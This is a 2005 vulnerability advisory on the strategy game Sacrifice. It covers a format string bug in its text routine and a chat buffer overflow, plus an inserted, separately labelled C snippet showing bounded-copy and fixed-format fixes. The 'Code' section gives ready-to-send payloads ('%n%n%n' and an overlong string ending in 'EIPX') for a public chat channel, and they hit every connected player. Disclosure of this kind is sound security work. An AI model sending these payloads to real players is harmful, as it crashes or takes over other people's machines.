#######################################################################

Luigi Auriemma

Application:  Sacrifice
Versions:     <= Patch #3
Platforms:    Windows
Bugs:         A] format string everywhere
              B] buffer-overflow in chat
Exploitation: remote, versus users (broadcast)
Date:         01 Aug 2005
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Sacrifice is a strategy game developed by Shiny Entertainment
(http://www.shiny.com) and published by Interplay
(http://www.interplay.com) back in 2000.


#######################################################################

=======
2) Bugs
=======

---------------------------
A] format string everywhere
---------------------------

The game uses a function in game3d.dll to build the text strings
displayed on the screen. Since this is a graphics routine, it is used
for ANY text (menus, chat, messages, names, server names... everything),
and it is affected by a format string vulnerability caused by the
incorrect use of vsprintf().

--------------------------
B] buffer-overflow in chat
--------------------------

An exploitable buffer overflow exists when the game receives a message
from the online chat (peerchat.gamespy.com). The bug is caused by the
unchecked copying of the message's characters (function GetWord() in
share.dll) into a buffer of only 256 bytes: copying continues until a
character less than or equal to 0x20 is reached, regardless of the
buffer size.
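Added example (not code from the advisory or from the game): a bounded word copy and a fixed-format text call, showing the two fixes a defender would apply for the bug classes above. Function names and the 600-byte input are assumptions, not taken from the game's binaries.

```c
#include <stdio.h>
#include <string.h>
#define WORD_MAX 256   /* size of the destination buffer named in the advisory */

/* Bounded replacement for a GetWord()-style copy (hypothetical name): copies
 * bytes from src until a byte <= 0x20 or end of string, never more than
 * dst_size - 1 bytes plus the terminator. Returns the number of bytes copied. */
size_t get_word_bounded(const char *src, char *dst, size_t dst_size)
{
    size_t n = 0;
    if (dst_size == 0) return 0;
    while (src[n] != '\0' && (unsigned char)src[n] > 0x20 && n < dst_size - 1) {
        dst[n] = src[n];
        n++;
    }
    dst[n] = '\0';
    return n;
}

/* Safe text formatting (hypothetical name): user text is an argument to a
 * fixed "%s" format, so %n and similar directives in chat text are rendered
 * literally. The bug class here is the text being used as the format itself. */
int render_text(char *out, size_t out_size, const char *user_text)
{
    return snprintf(out, out_size, "%s", user_text);
}

static char g_word[WORD_MAX];
/* Constructed input: 600 'a' bytes, far longer than the 256-byte buffer. */
size_t demo_overlong_word(void)
{
    char msg[601];
    memset(msg, 'a', 600);
    msg[600] = '\0';
    return get_word_bounded(msg, g_word, sizeof g_word);   /* 255, not 600 */
}

/* Returns 1 if "%n%n%n" survives rendering unchanged. */
int demo_format_literal(void)
{
    char out[64];
    render_text(out, sizeof out, "%n%n%n");
    return strcmp(out, "%n%n%n") == 0;
}

int main(void)
{
    printf("copied %zu; %%n literal: %d\n", demo_overlong_word(), demo_format_literal());
    return 0;
}
```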
#######################################################################

===========
3) The Code
===========


The easiest way to exploit these bugs is to use a normal IRC client to
join the channel #GSP!sacrifice on the server peerchat.gamespy.com and
then send the following messages:

A] %n%n%n

B] aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaEIPX


#######################################################################

======
4) Fix
======


The game is no longer supported.


#######################################################################